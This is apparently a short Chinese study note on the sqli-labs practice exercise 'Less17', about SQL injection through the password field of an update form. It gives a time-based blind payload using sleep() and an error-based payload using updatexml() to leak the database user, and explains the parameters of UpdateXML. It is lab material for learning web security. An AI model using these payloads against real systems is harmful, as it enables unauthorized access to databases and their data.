Less17【报错注入+Update注入/时间注入】

    有两个注入点，user和新密码，通过查看源码得知，注入点只有password一项，并且是当存在username时，才会对password一项进行注入。

注入方式1：时间注入

利用单引号进行报错，后续可以利用时间

admin

2132321 'and if((database()='security'),sleep(0.3),sleep(0.1))#

后续与之前相同

 

注入方式2：updatexml函数注入

UpdateXML(xml_target,xpath_expr,new_xml)

    xml_target:需要操作的xml片段

    xpath_expr：需要更新的xml路径

    new_xml:更新后的内容

123' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#